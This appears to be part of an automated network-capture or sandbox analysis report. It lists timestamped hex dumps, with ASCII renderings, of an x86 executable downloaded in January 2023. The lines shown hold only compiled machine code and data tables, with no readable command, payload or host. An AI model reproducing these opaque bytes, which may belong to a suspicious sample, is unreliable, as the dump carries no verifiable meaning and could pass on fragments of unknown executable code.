                  2023-01-13 15:04:35 UTC329INData Raw: e8 cf a7 05 00 83 c4 0c 8b 2e 83 7e 64 00 75 55 8b 46 68 8b 08 50 ff 51 18 83 c4 04 89 c7 85 c0 74 27 68 3c 13 4f 00 68 3c 13 4f 00 57 68 e9 04 4e 00 e8 ba 59 fe ff 83 c4 10 50 ff b5 a0 00 00 00 e8 ab 23 fd ff 83 c4 08 57 e8 72 64 fe ff 83 c4 04 8b 46 68 8b 08 50 ff 11 83 c4 04 e8 8f 9d ff ff 89 46 68 56 ff 73 38 e8 c3 8a fe ff 83 c4 08 8d 46 1c 50 e8 77 bb fe ff 83 c4 04 8d 46 30 50 e8 6b bb fe ff 90 90 90 90 90 90 90 90 90 90 90 83 c4 04 8b 46 58 85 c0 74 0e 8b 48 08 89 4e 58 50 e8 1a 64 fe ff eb e8 8b 46 68 85 c0 74 23 8b 0e 8d 56 6c 39 51 10 75 11 c7 41 0c 00 00 00 00 c7 41 10 00 00 00 00 8b 46 68 8b 08 50 ff 11 83 c4 04 56 e8 e8 63 fe ff 83 c4 04 53 68 30 2d 45 00 e8 8a 2a fd ff 83 c4 08 5e 5f 5b 5d c3 cc cc 56 8b 74 24 08 80 7e 31 00 74 02 5e c3 80
                  Data Ascii: .~duUFhPQt'h<Oh<OWhNYP#WrdFhPFhVs8FPwF0PkFXtHNXPdFht#Vl9QuAAFhPVcSh0-E*^_[]Vt$~1t^
                  2023-01-13 15:04:35 UTC337INData Raw: 78 a7 00 74 11 c6 40 a7 00 6a ff ff 70 34 e8 8e 18 fd ff 83 c4 08 c3 cc cc cc cc cc cc cc cc cc cc 53 57 56 8b 74 24 10 6a 00 ff 76 90 e8 1f 5e fe ff 83 c4 08 85 c0 74 38 8a 4c 24 14 80 f1 01 bf 01 00 00 00 0f b6 d9 90 90 90 90 90 90 90 90 90 8b 40 1c 8b 08 53 50 ff 51 14 83 c4 08 57 ff 76 90 e8 ea 5d fe ff 83 c4 08 83 c7 01 85 c0 75 e0 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 08 8b 4c 24 04 8a 44 01 a5 c3 cc cc cc 8a 44 24 0c 8b 4c 24 08 8b 54 24 04 88 44 0a a5 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 c6 40 c0 01 c3 cc cc cc cc cc cc cc 8b 44 24 04 8a 4c 24 08 88 48 a8 c6 40 d9 01 84 c9 74 0b ff 70 34 e8 35 19 fd ff 83 c4 04 c3 cc 8b 44 24 04 8a 40 a8 c3 cc cc cc cc cc cc cc cc 55 53 57 56 8b 7c 24 14 83 7f a0 00 74 56
                  Data Ascii: xt@jp4SWVt$jv^t8L$@SPQWv]u^_[D$L$DD$L$T$DD$@D$L$H@tp45D$@USWV|$tV
                  2023-01-13 15:04:35 UTC345INData Raw: 1b fe ff 83 c4 04 50 ff 73 20 e8 62 e5 fc ff 83 c4 08 8b 43 04 8b 00 6a 46 ff 50 0c 83 c4 04 83 c0 20 50 ff 73 0c e8 66 5a ff ff 83 c4 08 c7 83 a8 fe ff ff 6c 03 00 00 53 e8 b3 70 ff ff 83 c4 04 84 c0 0f 85 81 e5 ff ff 8b 85 60 01 00 00 6a 01 50 50 ff 50 18 83 c4 0c 85 c0 0f 84 69 e5 ff ff 89 c6 8b 00 83 f8 47 74 45 83 f8 0f 0f 85 f4 06 00 00 68 96 70 4e 00 e8 f4 1a fe ff 83 c4 04 50 ff 73 20 e8 e8 e4 fc ff 83 c4 08 68 8c 0e 4f 00 e8 db 1a fe ff 83 c4 04 50 53 e8 f1 67 ff ff 83 c4 08 c6 83 03 ff ff ff 01 e9 f0 f0 ff ff 89 f0 83 c0 18 50 e8 47 22 fe ff 83 c4 04 83 7e 24 00 0f 85 fc 06 00 00 89 d3 89 04 24 68 a9 59 4e 00 e8 9b 1a fe ff 83 c4 04 50 8b 7c 24 54 ff 77 20 e8 8b e4 fc ff 83 c4 08 8b 87 2c ff ff ff c6 00 01 8b 87 2c ff ff ff c6 40 01 01 68 95 25
                  Data Ascii: Ps bCjFP PsfZlSp`jPPPiGtEhpNPs hOPSgPG"~$$hYNP|$Tw ,,@h%
                  2023-01-13 15:04:35 UTC352INData Raw: 83 c4 04 ff 76 0c e8 46 0c ff ff 83 c4 04 ff 76 10 e8 3b 0c ff ff 83 c4 04 ff 76 24 e8 e0 06 fe ff 83 c4 04 ff b6 94 00 00 00 e8 d2 06 fe ff 83 c4 04 ff 76 18 e8 c7 06 fe ff 83 c4 04 ff 76 1c e8 bc 06 fe ff 83 c4 04 8b 86 88 00 00 00 85 c0 74 09 50 e8 99 68 fe ff 83 c4 04 ff b6 b4 00 00 00 e8 9b 06 fe ff 83 c4 04 ff b6 b0 00 00 00 e8 8d 06 fe ff 83 c4 04 8b 86 a0 00 00 00 85 c0 74 09 50 e8 6a 0c fe ff 83 c4 04 8b 86 a4 00 00 00 85 c0 74 09 50 e8 57 0c fe ff 83 c4 04 8b 86 a8 00 00 00 85 c0 74 09 50 e8 44 0c fe ff 83 c4 04 ff b6 80 00 00 00 e8 36 0c fe ff 83 c4 04 8b 86 28 01 00 00 85 c0 74 09 50 e8 93 13 fe ff 83 c4 04 8b 86 60 01 00 00 85 c0 74 09 50 e8 80 13 fe ff 83 c4 04 ff b6 30 01 00 00 e8 12 06 fe ff 83 c4 04 8b 86 34 01 00 00 85 c0 74 09 8b 08 50
                  Data Ascii: vFv;v$vvtPhtPjtPWtPD6(tP`tP04tP
                  2023-01-13 15:04:35 UTC360INData Raw: 00 0f 85 96 fd ff ff e9 64 fd ff ff c7 06 25 07 00 00 e9 f1 13 00 00 8b 86 dc 00 00 00 8b 8e e0 00 00 00 c1 e1 04 8b 44 08 04 8b 78 04 8b 58 08 8b 86 8c 01 00 00 8b 08 50 ff 51 64 83 c4 04 84 c0 74 22 53 e8 e8 a6 00 00 83 c4 04 57 50 68 e4 0a 4f 00 e8 99 dc fd ff 83 c4 0c 50 55 e8 af 29 ff ff 83 c4 08 8b 86 6c 01 00 00 8b 00 6a 32 ff 50 0c 83 c4 04 89 86 f8 00 00 00 83 c0 30 ff b6 90 00 00 00 50 e8 77 e0 fd ff 83 c4 08 8b 46 08 8b 8e f8 00 00 00 8b 00 83 c1 30 ff 70 18 51 e8 5d e0 fd ff 83 c4 08 8b 86 f8 00 00 00 83 c0 30 68 8a d9 4d 00 50 e8 46 e0 fd ff 83 c4 08 8b 86 f8 00 00 00 83 c0 30 6a 01 50 e8 d2 de fd ff 83 c4 08 8b 86 dc 00 00 00 8b 8e e0 00 00 00 c1 e1 04 8b 04 08 8b 96 f8 00 00 00 89 f1 ff 70 08 ff 70 04 ff b6 ec 00 00 00 ff b6 e8 00 00 00 e8
                  Data Ascii: d%DxXPQdt"SWPhOPU)lj2P0PwF0pQ]0hMPF0jPpp
                  2023-01-13 15:04:35 UTC368INData Raw: ff 72 10 e8 39 c5 fd ff 83 c4 04 89 44 24 0c 89 54 24 14 ff 75 10 e8 26 c5 fd ff 83 c4 04 89 c7 89 54 24 04 ff 75 10 e8 15 c5 fd ff 83 c4 04 8d 86 68 01 00 00 50 e8 d6 0a ff ff 83 c4 04 89 86 88 00 00 00 c6 00 01 8b 86 88 00 00 00 c6 40 01 01 89 6c 24 20 ff 75 10 e8 54 c4 fd ff 83 c4 04 89 86 8c 00 00 00 85 c0 89 7c 24 10 0f 84 15 01 00 00 b8 4d 2c 4e 00 b9 cf 16 4e 00 84 db 0f 45 c8 89 4c 24 18 31 ff 89 74 24 08 eb 55 90 90 90 90 8d 48 0c ff 74 24 18 68 bd 08 4f 00 51 89 c6 e8 bc c2 fd ff 89 f0 83 c4 0c 8b 74 24 08 0f b6 5c 24 38 50 e8 e8 cd fd ff 83 c4 04 0f b6 4c 24 03 51 50 ff b6 88 00 00 00 e8 d3 28 fe ff 83 c4 0c 83 c7 01 8b 86 8c 00 00 00 39 c7 0f 83 a7 00 00 00 c6 86 fc 00 00 00 00 8b 5c 24 20 ff 73 10 e8 4c c4 fd ff 83 c4 04 89 c6 89 d5 ff 73 10
                  Data Ascii: r9D$T$u&T$uhP@l$ uT|$M,NNEL$1t$UHt$hOQt$\$8PL$QP(9\$ sLs
                  2023-01-13 15:04:35 UTC376INData Raw: 04 00 00 00 00 55 57 e8 b5 54 fd ff 83 c4 08 84 c0 0f 84 bc 0a 00 00 c7 44 24 04 00 00 00 00 eb 28 55 e8 7a 22 00 00 83 c4 04 89 f5 6a 00 56 e8 9d ad fd ff 83 c4 08 56 57 e8 83 54 fd ff 83 c4 08 84 c0 0f 84 8a 0a 00 00 89 ee ff 75 00 e8 3e 58 fd ff 83 c4 04 85 c0 74 d0 89 c5 83 78 04 00 74 bf ff 74 24 14 ff 74 24 20 ff 75 08 e8 ff 23 00 00 83 c4 0c 84 c0 74 a8 55 ff 74 24 54 e8 6e ba fd ff 83 c4 08 b0 01 89 44 24 04 eb 9c 8b 74 24 48 85 f6 75 17 68 41 03 00 00 68 36 59 4f 00 68 fa 15 4f 00 e8 aa eb 04 00 83 c4 0c 8b 56 60 8b 04 24 8d 88 84 02 00 00 e8 d3 1e 00 00 89 70 08 c6 40 10 00 80 7c 24 26 00 74 1a 8b 04 24 8d 88 84 02 00 00 ba 4d 34 4e 00 e8 b2 1e 00 00 c7 40 08 00 00 00 00 83 7c 24 08 00 0f 8e de 00 00 00 8b 04 24 8d b8 90 02 00 00 31 c9 31 d2 eb
                  Data Ascii: UWTD$(Uz"jVVWTu>Xtxtt$t$ u#tUt$TnD$t$HuhAh6YOhOV`$p@|$&t$M4N@|$$11
                  2023-01-13 15:04:35 UTC384INData Raw: 39 e9 0f 42 d8 8b 86 28 01 00 00 83 e0 05 83 f8 01 75 1a 39 e9 0f 42 e9 6b c5 c4 03 86 38 01 00 00 8d 8b f0 d8 ff ff 83 f8 0a 0f 42 d9 56 68 e0 07 46 00 53 e8 08 52 fc ff 83 c4 0c 89 86 10 01 00 00 31 c9 89 c8 5e 5f 5b 5d c3 cc cc cc cc cc cc 55 53 57 56 50 89 d6 89 cf 52 e8 71 0b 05 00 83 c4 04 89 04 24 83 7f 04 00 74 2d 31 ed 31 db 90 8b 07 ff 34 24 56 ff 74 28 04 ff 34 28 e8 3e 8b fd ff 83 c4 10 84 c0 75 43 83 c3 01 8b 47 04 83 c5 14 39 c3 72 da eb 02 31 c0 8d 4f 08 6a 00 6a 01 50 6a 14 51 ff 37 e8 64 89 fd ff 83 c4 18 89 07 8b 4f 04 8d 51 01 89 57 04 8d 0c 89 8d 2c 88 89 34 88 8b 14 24 89 54 88 04 eb 02 03 2f 89 e8 83 c4 04 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 57 56 8b 74 24 0c 80 be 0c 01 00 00 00 0f 85 9f 00 00 00 8b 7c 24 10 39 be 10 01 00 00 0f
                  Data Ascii: 9B(u9Bk8BVhFSR1^_[]USWVPRq$t-114$Vt(4(>uCG9r1OjjPjQ7dOQW,4$T/^_[]WVt$|$9
                  2023-01-13 15:04:35 UTC392INData Raw: 89 84 24 00 01 00 00 e8 e5 6f fd ff 89 44 24 14 89 44 24 28 8b 4e 10 31 ff 31 db be b5 53 4e 00 90 51 e8 2a 66 fd ff 83 c4 04 3c 0a 0f 84 78 03 00 00 3c 0d 0f 84 70 03 00 00 8b 8c 24 18 01 00 00 8b 49 10 83 79 0c 00 0f 85 5c 03 00 00 3c 3a 74 15 83 fb 27 0f 84 4f 03 00 00 88 84 1c d8 00 00 00 83 c3 01 eb ba 51 e8 e4 65 fd ff 83 c4 04 3c 20 0f 85 32 03 00 00 c6 84 1c d8 00 00 00 00 8d b4 24 d8 00 00 00 6a 16 68 10 c6 4e 00 56 e8 da c6 03 00 83 c4 0c 31 ff 85 c0 74 4e 6a 16 68 59 c8 4e 00 56 e8 c4 c6 03 00 83 c4 0c 85 c0 74 53 6a 16 68 09 cd 4e 00 56 e8 b0 c6 03 00 83 c4 0c 85 c0 74 5a 6a 14 68 91 e3 4e 00 56 e8 9c c6 03 00 83 c4 0c 85 c0 b8 17 e0 4d 00 be f5 da 4d 00 0f 44 f0 31 ff e9 bf 02 00 00 c7 44 24 04 03 00 00 00 c7 44 24 10 00 81 4d 00 b0 01 89 04
                  Data Ascii: $oD$D$(N11SNQ*f<x<p$Iy\<:t'OQe< 2$jhNV1tNjhYNVtSjhNVtZjhNVMMD1D$D$M
                  2023-01-13 15:04:35 UTC399INData Raw: 02 85 f6 74 0b 56 e8 46 cd 04 00 83 c4 04 eb 02 31 c0 89 74 24 08 83 cd 03 01 dd 01 c5 6a 00 6a 01 55 e8 ca 4a fd ff 83 c4 0c 89 c6 53 e8 bf 0a 00 00 83 c4 04 57 50 68 0f 07 4f 00 56 e8 3f ca f9 ff 83 c4 10 89 c5 89 74 24 04 01 f5 83 7c 24 38 00 7e 37 31 db 8b 3c 24 90 90 90 90 90 90 90 90 8b 74 24 38 29 de 83 fe 03 b8 03 00 00 00 0f 4d f0 8d 04 1f 55 56 50 e8 84 3b 00 00 83 c4 0c 01 f3 83 c5 04 3b 5c 24 38 7c d6 8b 44 24 08 85 c0 74 13 c6 45 00 20 83 c5 01 50 55 e8 60 c6 04 00 83 c4 08 eb 04 c6 45 00 00 8b 4c 24 20 31 e1 e8 1c 96 03 00 8b 44 24 04 83 c4 24 5e 5f 5b 5d c3 55 53 57 56 83 ec 50 8b 74 24 68 8b 7c 24 64 a1 34 00 50 00 31 e0 89 44 24 4c e8 d1 4f fd ff 89 c5 89 7c 24 04 89 7c 24 18 89 74 24 20 c7 44 24 1c 00 00 00 00 c7 44 24 24 00 00 00 00 8d
                  Data Ascii: tVF1t$jjUJSWPhOV?t$|$8~71<$t$8)MUVP;;\$8|D$tE PU`EL$ 1D$$^_[]USWVPt$h|$d4P1D$LO|$|$t$ D$D$$
                  2023-01-13 15:04:35 UTC407INData Raw: e8 0c ae 04 00 83 c4 04 89 f1 89 f2 83 f8 2f 0f 85 94 02 00 00 68 e0 bb 4e 00 57 e8 31 b0 04 00 83 c4 08 80 3c 07 00 89 f1 89 f2 0f 85 78 02 00 00 0f be 07 89 f1 89 f2 83 f8 3a 0f 84 68 02 00 00 80 7f 01 3a 89 f1 89 f2 0f 84 5a 02 00 00 80 7f 03 3a 89 f1 89 f2 0f 84 4c 02 00 00 80 7f 04 3a 89 f1 89 f2 0f 84 3e 02 00 00 80 7f 06 3a 89 f1 89 f2 0f 84 30 02 00 00 80 7f 07 3a 89 f1 89 f2 0f 84 22 02 00 00 80 7f 09 3a 89 f1 89 f2 0f 84 14 02 00 00 80 7f 0a 3a 89 f1 89 f2 0f 84 06 02 00 00 80 7f 0c 3a 89 f1 89 f2 0f 84 f8 01 00 00 80 7f 0d 3a 89 f1 89 f2 0f 84 ea 01 00 00 80 7f 0f 3a 89 f1 89 f2 0f 84 dc 01 00 00 80 7f 10 3a 89 f1 89 f2 0f 84 ce 01 00 00 80 7f 12 3a 89 f1 89 f2 0f 84 c0 01 00 00 80 7f 13 3a 89 f1 89 f2 0f 84 b2 01 00 00 80 7f 15 3a 89 f1 89 f2
                  Data Ascii: /hNW1<x:h:Z:L:>:0:":::::::::
                  2023-01-13 15:04:35 UTC415INData Raw: 00 56 ff 77 fc e8 37 04 fd ff 83 c4 0c 89 6c 24 04 89 1c 24 89 e6 6a 08 56 ff 77 fc e8 10 04 fd ff 83 c4 0c 6a 08 56 e8 d5 d3 ff ff 83 c4 08 83 7f e4 00 74 14 6a 61 68 ae 57 4f 00 68 34 80 4f 00 e8 ce 4f 04 00 83 c4 0c 8b 47 94 8b 4c 24 24 89 01 8b 47 98 89 41 04 8b 47 9c 89 41 08 8b 47 a0 89 41 0c 8b 4c 24 08 31 e1 e8 e2 57 03 00 83 c4 0c 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 83 c6 94 6a 78 56 e8 70 d3 ff ff 83 c4 08 56 e8 67 0c fd ff 83 c4 04 5e c3 cc cc 55 53 57 56 83 ec 68 8b 94 24 84 00 00 00 a1 34 00 50 00 31 e0 89 44 24 64 85 d2 0f 84 a1 03 00 00 8b bc 24 80 00 00 00 8b 5c 24 7c 8d 6b b0 89 6c 24 04 eb 15 90 90 90 90 90 90 90 90 90 90 90 01 f7 85 d2 0f 84 78 03 00 00 89 14 24 8b 45 40 be 40 00 00 00 29 c6 39 f2 0f 42 f2 01 e8
                  Data Ascii: Vw7l$$jVwjVtjahWOh4OOGL$$GAGAGAL$1W^_[]Vt$jxVpVg^USWVh$4P1D$d$\$|kl$x$E@@)9B
                  2023-01-13 15:04:35 UTC423INData Raw: 00 00 00 83 c0 08 89 46 04 6a 08 50 e8 b0 b4 ff ff 83 c4 08 83 3e 00 74 1f 31 c0 90 90 90 90 90 90 8b 4e 04 c7 04 81 00 00 00 00 83 c0 01 3b 06 72 ef eb 04 8b 74 24 08 89 f0 83 c4 18 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 14 8b 74 24 28 ff 76 10 e8 1d ea fc ff 83 c4 04 89 c7 8b 46 10 83 78 0c 00 74 4a 6a 08 6a 08 6a 01 e8 b4 ec fc ff 83 c4 0c 89 c6 c7 00 02 00 00 00 83 c0 08 89 46 04 6a 08 50 e8 2b b4 ff ff 83 c4 08 83 3e 00 74 14 31 c0 90 8b 4e 04 c7 04 81 00 00 00 00 83 c0 01 3b 06 72 ef 89 f0 83 c4 14 5e 5f 5b 5d c3 85 d2 74 0f 80 3f 00 0f 88 f8 00 00 00 0f 84 e3 00 00 00 8d 42 03 c1 e8 02 bd 01 00 00 00 0f 45 e8 8d 1c ad 00 00 00 00 53 6a 08 6a 01 89 54 24 0c e8 3f ec fc ff 83 c4 0c 89 c6 89 28 83 c0 08 89 46 04
                  Data Ascii: FjP>t1N;rt$^_[]USWVt$(vFxtJjjjFjP+>t1N;r^_[]t?BESjjT$?(F
                  2023-01-13 15:04:35 UTC431INData Raw: ff 76 04 e8 79 95 ff ff 83 c4 08 6a 08 56 e8 6e 95 ff ff 83 c4 08 56 e8 65 ce fc ff 83 c4 04 89 f8 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 57 56 8b 74 24 0c 8b 3e 8b 07 c1 e0 02 50 ff 77 04 e8 3a 95 ff ff 83 c4 08 6a 08 57 e8 2f 95 ff ff 83 c4 08 57 e8 26 ce fc ff 83 c4 04 8b 7e 14 8b 07 c1 e0 02 50 ff 77 04 e8 12 95 ff ff 83 c4 08 6a 08 57 e8 07 95 ff ff 83 c4 08 57 e8 fe cd fc ff 83 c4 04 8b 7e 18 8b 07 c1 e0 02 50 ff 77 04 e8 ea 94 ff ff 83 c4 08 6a 08 57 e8 df 94 ff ff 83 c4 08 57 e8 d6 cd fc ff 83 c4 04 8b 7e 1c 8b 07 c1 e0 02 50 ff 77 04 e8 c2 94 ff ff 83 c4 08 6a 08 57 e8 b7 94 ff ff 83 c4 08 57 e8 ae cd fc ff 83 c4 04 8b 7e 10 8b 07 c1 e0 02 50 ff 77 04 e8 9a 94 ff ff 83 c4 08 6a 08 57 e8 8f 94 ff ff 83 c4 08 57 e8 86 cd fc ff 83 c4 04 8b
                  Data Ascii: vyjVnVe^_[]WVt$>Pw:jW/W&~PwjWW~PwjWW~PwjWW~PwjWW
                  2023-01-13 15:04:35 UTC438INData Raw: 24 04 31 ef 89 54 24 08 21 d0 21 f7 21 ee 8b 51 04 bd 00 00 00 00 39 5c 24 10 76 85 8b 2c 9a eb 80 8b 54 24 10 85 d2 8b 4c 24 28 0f 84 97 00 00 00 83 44 24 18 02 c7 04 24 00 00 00 00 31 c0 31 db eb 33 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 6c 24 14 31 c1 31 c0 03 74 24 04 0f 92 c0 01 d6 83 d0 00 89 34 9f 83 c3 01 8b 6c 24 24 8b 55 00 39 d3 73 52 89 54 24 10 89 44 24 04 8b 3c 24 89 da 33 54 24 18 89 d6 d1 ee 83 e2 01 31 c0 09 f2 0f 94 c0 09 f8 89 04 24 89 c6 f7 de b8 00 00 00 00 19 c0 89 ef 89 cd 8b 54 24 14 31 d5 21 c8 21 f5 21 d6 8b 7f 04 ba 00 00 00 00 39 5c 24 10 76 8e 8b 14 9f eb 89 8b 74 24 2c 56 6a 08 6a 01 e8 db ad fc ff 83 c4 0c 83 7c 24 3c 00 89 44 24 10 75 18 6a 48 68 24 32 4f 00 68 c0 15 4f 00 e8 5f f1 03 00 8b 44 24 1c 83 c4 0c 8b 4c 24
                  Data Ascii: $1T$!!!Q9\$v,T$L$(D$$1131l$11t$4l$$U9sRT$D$<$3T$1$T$1!!!9\$vt$,Vjj|$<D$ujHh$2OhO_D$L$
                  Data Ascii: uuhOuu VM}]WSujIuaWShOu VWSujMu7(WShOu VWSujSu(WShOu VWSujpuuujXuEx}xELPuuP#
                  2023-01-13 15:04:35 UTC767INData Raw: ff 0f 84 ba 00 00 00 8b d1 83 fe 73 74 65 3b f0 75 13 83 a4 b5 c0 f8 ff ff 00 8d 47 01 03 c1 89 85 bc f8 ff ff 8b 85 88 f8 ff ff 8b 04 88 8b 8d 9c f8 ff ff f7 24 b9 8b 8d 98 f8 ff ff 03 84 b5 c0 f8 ff ff 83 d2 00 03 85 ac f8 ff ff 89 84 b5 c0 f8 ff ff 8b 85 bc f8 ff ff 83 d2 00 41 89 95 ac f8 ff ff 46 89 8d 98 f8 ff ff 3b 8d a0 f8 ff ff 75 96 85 d2 74 44 8d 8d c0 f8 ff ff 8d 0c b1 89 8d ac f8 ff ff 83 fe 73 74 30 3b f0 75 0c 83 21 00 8d 46 01 89 85 bc f8 ff ff 83 85 ac f8 ff ff 04 8b c2 46 33 d2 01 01 8b 85 bc f8 ff ff 13 d2 74 08 8b 8d ac f8 ff ff eb cb 8b 95 b4 f8 ff ff 83 fe 73 0f 84 83 00 00 00 8b b5 9c f8 ff ff 47 3b fa 0f 85 ee fe ff ff 89 85 5c fc ff ff be cc 01 00 00 c1 e0 02 50 8d 85 c0 f8 ff ff 50 8d 85 60 fc ff ff 56 50 e8 ed 55 fe ff 83 c4 10
                  Data Ascii: ste;uG$AF;utDst0;u!FF3tsG;\PP`VPU
                  2023-01-13 15:04:35 UTC774INData Raw: ff ff 85 c0 74 5a 6a 02 50 e8 47 3a ff ff 8b f0 59 59 85 f6 74 c8 ff b5 74 ff ff ff 56 ff 75 14 ff b5 78 ff ff ff e8 dd 05 ff ff eb a5 85 c0 75 2f 6a 02 8d 85 78 ff ff ff 89 bd 78 ff ff ff 50 8b 45 14 0d 00 00 00 20 50 56 e8 b9 05 ff ff 85 c0 74 0d 8a 85 78 ff ff ff 88 03 e9 0c ff ff ff 83 c8 ff 8b 4d fc 5f 5e 33 cd 5b e8 61 ba fd ff c9 c3 57 57 57 57 57 e8 0e 1f ff ff cc 8b ff 55 8b ec 83 ec 1c a1 34 00 50 00 33 c5 89 45 fc 53 56 57 ff 75 08 8d 4d e4 e8 8d 37 fe ff 8b 45 e8 33 ff 57 57 ff 75 10 8b 40 08 ff 75 0c 89 45 f4 e8 53 05 ff ff 89 45 f8 85 c0 0f 84 80 00 00 00 03 c0 8d 48 08 3b c1 1b c0 23 c1 74 6a 3d 00 04 00 00 77 13 e8 98 00 00 00 8b f4 85 f6 74 1e c7 06 cc cc 00 00 eb 13 50 e8 05 27 ff ff 8b f0 59 85 f6 74 09 c7 06 dd dd 00 00 83 c6 08 8b de
                  Data Ascii: tZjPG:YYttVuxu/jxxPE PVtxM_^3[aWWWWWU4P3ESVWuM7E3WWu@uESEH;#tj=wtP'Yt
                  2023-01-13 15:04:35 UTC782INData Raw: 14 24 e8 f2 0e 00 00 e8 0d 00 00 00 83 c4 0c c3 8d 54 24 04 e8 9d 0e 00 00 52 9b d9 3c 24 74 4c 8b 44 24 0c 66 81 3c 24 7f 02 74 06 d9 2d a8 c9 4d 00 a9 00 00 f0 7f 74 5e a9 00 00 00 80 75 41 d9 ec d9 c9 d9 f1 83 3d cc 40 50 00 00 0f 85 bc 0e 00 00 8d 0d 90 c7 4d 00 ba 1b 00 00 00 e9 b9 0e 00 00 a9 00 00 00 80 75 17 eb d4 a9 ff ff 0f 00 75 1d 83 7c 24 08 00 75 16 25 00 00 00 80 74 c5 dd d8 db 2d 60 c9 4d 00 b8 01 00 00 00 eb 22 e8 08 0e 00 00 eb 1b a9 ff ff 0f 00 75 c5 83 7c 24 08 00 75 be dd d8 db 2d 0a c9 4d 00 b8 02 00 00 00 83 3d cc 40 50 00 00 0f 85 50 0e 00 00 8d 0d 90 c7 4d 00 ba 1b 00 00 00 e8 49 0f 00 00 5a c3 e9 0b 00 00 00 cc cc cc cc cc cc cc cc cc cc cc 83 3d 08 39 50 00 02 7c 08 83 ec 04 db 0c 24 58 c3 55 8b ec 83 c4 f0 83 e4 f0 d9 c0 db 3c
                  Data Ascii: $T$R<$tLD$f<$t-Mt^uA=@PMuu|$u%t-`M"u|$u-M=@PPMIZ=9P|$XU<
                  2023-01-13 15:04:35 UTC790INData Raw: 1b c9 81 e1 08 ff ff ff 8d 81 00 01 00 00 5d c3 55 8b ec 51 83 3d 08 39 50 00 01 7c 66 81 7d 08 b4 02 00 c0 74 09 81 7d 08 b5 02 00 c0 75 54 0f ae 5d fc 8b 45 fc 83 f0 3f a8 81 74 3f a9 04 02 00 00 75 07 b8 8e 00 00 c0 c9 c3 a9 02 01 00 00 74 2a a9 08 04 00 00 75 07 b8 91 00 00 c0 c9 c3 a9 10 08 00 00 75 07 b8 93 00 00 c0 c9 c3 a9 20 10 00 00 75 0e b8 8f 00 00 c0 c9 c3 b8 90 00 00 c0 c9 c3 8b 45 08 c9 c3 90 90 8b 54 24 08 8d 42 0c 8b 4a e4 33 c8 e8 b6 7b fd ff b8 98 f1 4f 00 e9 9e ff fe ff 90 90 8b 54 24 08 8d 42 0c 8b 4a f4 33 c8 e8 99 7b fd ff b8 6c f1 4f 00 e9 81 ff fe ff 90 90 8b 54 24 08 8d 42 0c 8b 4a e0 33 c8 e8 7c 7b fd ff b8 64 f2 4f 00 e9 64 ff fe ff 90 90 8b 54 24 08 8d 42 0c 8b 4a f0 33 c8 e8 5f 7b fd ff b8 d4 f2 4f 00 e9 47 ff fe ff 90 90 8b
                  Data Ascii: ]UQ=9P|f}t}uT]E?t?ut*uu uET$BJ3{OT$BJ3{lOT$BJ3|{dOdT$BJ3_{OG
                  2023-01-13 15:04:35 UTC798INData Raw: 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 87 a5 41 00 ef a3 41 00 5a a4 41 00 7a a4 41 00 00 00 00 00 08 00 00 00 12 00 00 00 09 00 00 00 09 00 00 00 14 00 00 00 0a 00 00 00 0a 00 00 00 13 00 00 00 0b 00 00 00 0b 00 00 00 14 00 00 00 0c 00 00 00 0c 00 00 00 15 00 00 00 0d 00 00 00 0d 00 00 00 13 00 00 00 0e 00 00 00 1b 00 00 00 12 00 00 00 1c 00 00 00 1e 00 00 00 13 00 00 00 1f 00 00 00 1f 00 00 00 14 00 00 00 20 00 00 00 20 00 00 00 15 00 00 00 23 00 00 00 25 00 00 00 0e 00 00 00 2b 00 00 00 2b 00 00 00 0d 00 00 00 2c 00 00 00 2c 00 00 00 10 00 00 00 2d 00 00 00 2d 00 00 00 0d 00
                  Data Ascii: AAAAAAAAAAAAAAAAAAAAZAzA #%++,,--
                  2023-01-13 15:04:35 UTC806INData Raw: 00 d9 a7 00 00 00 00 00 00 f2 a7 00 00 01 a8 00 00 00 00 00 00 02 a8 00 00 02 a8 00 00 11 00 00 00 03 a8 00 00 05 a8 00 00 00 00 00 00 06 a8 00 00 06 a8 00 00 11 00 00 00 07 a8 00 00 0a a8 00 00 00 00 00 00 0b a8 00 00 0b a8 00 00 11 00 00 00 0c a8 00 00 24 a8 00 00 00 00 00 00 25 a8 00 00 26 a8 00 00 11 00 00 00 27 a8 00 00 27 a8 00 00 00 00 00 00 2c a8 00 00 2c a8 00 00 11 00 00 00 30 a8 00 00 37 a8 00 00 00 00 00 00 38 a8 00 00 39 a8 00 00 0e 00 00 00 40 a8 00 00 73 a8 00 00 00 00 00 00 80 a8 00 00 c3 a8 00 00 00 00 00 00 c4 a8 00 00 c5 a8 00 00 11 00 00 00 ce a8 00 00 d9 a8 00 00 00 00 00 00 e0 a8 00 00 f1 a8 00 00 11 00 00 00 f2 a8 00 00 fe a8 00 00 00 00 00 00 ff a8 00 00 ff a8 00 00 11 00 00 00 00 a9 00 00 25 a9 00 00 00 00 00 00 26 a9 00 00 2d a9
                  Data Ascii: $%&'',,0789@s%&-
                  2023-01-13 15:04:35 UTC813INData Raw: fb 02 00 52 fb 03 00 00 00 03 00 00 00 02 00 56 fb 02 00 62 fb 02 00 5a fb 03 00 00 00 03 00 00 00 02 00 76 fb 02 00 72 fb 03 00 00 00 02 00 7a fb 02 00 7e fb 01 00 88 fb 03 00 00 00 03 00 00 00 03 00 00 00 01 00 84 fb 01 00 82 fb 01 00 86 fb 03 00 00 00 03 00 00 00 01 00 8c fb 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 01 00 8a fb 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 02 00 6a fb 03 00 00 00 02 00 6e fb 03 00 00 00 03 00 00 00 02 00 8e fb 03 00 00 00 03 00 00 00 03 00 00 00 